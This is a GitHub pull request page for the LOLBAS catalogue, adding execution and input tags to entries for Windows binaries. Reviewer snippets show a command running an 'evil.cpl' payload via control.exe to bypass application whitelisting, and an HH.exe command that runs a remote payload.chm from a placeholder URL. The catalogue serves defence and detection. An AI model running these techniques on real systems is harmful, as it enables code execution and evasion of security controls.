Pull request: Added Execute Tags to most of the LOLBas #405
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Changed tags Execute DLL to Execute .NetDLL Added Execute: .NetEXE tag
Tags added: - .NetObjects - Fixed Format
Added tags - Execute: EXE - Input: Custom Format
Added the following tags: - Execute: EXE - Input: Custom Format
Added tags: - Execute: CMD - Input: Custom format
Added Tags: - Input: CustomFormat
Tags: Changed Input: INF to Execute INF for consistency Inout: Customformat added
Execute and Input Tags added
Added Execution section to Control.exe Added tags: - Input Custom Format
Added Input tag
Added Tags: - Execute EXE - Input Fixed Format
Added Tags: - Execute ClickOnce - Execute Remote - Input Custom Format
Added Tags: - Execute CMD - Input CustomFormat
Added Tags: - Execution: Remote - Input: Custom Format
Added Tags: - Execute EXE - Input: Custom Format
Added Tags: - Input CustomFormat
Added Tags: - Execute EXE - Input: Custom Format
Added Tags: Execute: EXE Input: Fixed Format
Added Tags: - Execute CMD - Input Custom Format
Added Tags: - Execute CMD - Input Fixed Format
Added the command to execute remote CHM files Added Tags
Added Tags: Execute INF Input: Fixed Format
Added Tags Execute EXE Input Fixed Format
Added Tags: Execute .NetEXE Execute Remote Input Custom Format
Added: Execute INF Input Custom Format
Added Tags: Input Custom Format
Added Tags: Execute EXE Execute Remote
Added Tags: Execute Powershell
Added Tags: Execute: Powershell
Added Tags: Execute Nuget Execute Remote
Added Tags: Execute WSH
Added Tags: - Execute: Javascript Execute CMD
Added Tags: Execute Nuget Execute Remote Execute EXE
Added Tags: Execute EXE
Added Tags: Execute EXE
Added Tags: Execute .NetObjects
Added Tags: Execute EXE Execute Remote
Added Tags: Execute: EXE
Added Tags Execute EXE
Added Tags: Execute C#
Added Tags: Execute EXE Execute CMD
Added Tags
This reverts commit 0e177e7.
This reverts commit 0795916.
This reverts commit 679b321.
This reverts commit 8715370.
|
Also, AWBypass and Execute sections are usually redundant. It could be interesting to add AWBypass as a tag rather than a section |
Update Dfshim.yml: Typo
|
This is a nice idea, thank you for looking into this and opening a pull request. |
wietze
reviewed
Nov 20, 2024
Comment on lines
+16
to
+24
| - Command: control.exe c:\windows\tasks\evil.cpl | ||
| Description: Execute evil.cpl payload. A CPL is a DLL file with CPlApplet export function) | ||
| Usecase: Use to execute code and bypass application whitelisting | ||
| Category: Execute | ||
| Privileges: User | ||
| MitreID: T1218.002 | ||
| OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 | ||
| Tags: | ||
| - Execute: DLL |
Comment on lines
+27
to
+37
| - Command: HH.exe http://some.url/payload.chm | ||
| Description: Executes a remote payload.chm file which can contain commands. | ||
| Usecase: Execute commands with HH.exe | ||
| Category: Execute | ||
| Privileges: User | ||
| MitreID: T1218.001 | ||
| OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 | ||
| Tags: | ||
| - Execute: CMD | ||
| - Execute: CHM | ||
| - Execute: Remote |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
Hi, I really like the Tags feature and wanted to add tags to see better what type of payload the LOLBas executes.
So I made a commit per LOLBas edited. If you want me to do just 1 big commit I will do another Pull Request
The following can be improved, please tell me if you want me to spend more time on this:
Anyway please tell me how you feel about this.
Regards,
Hegusung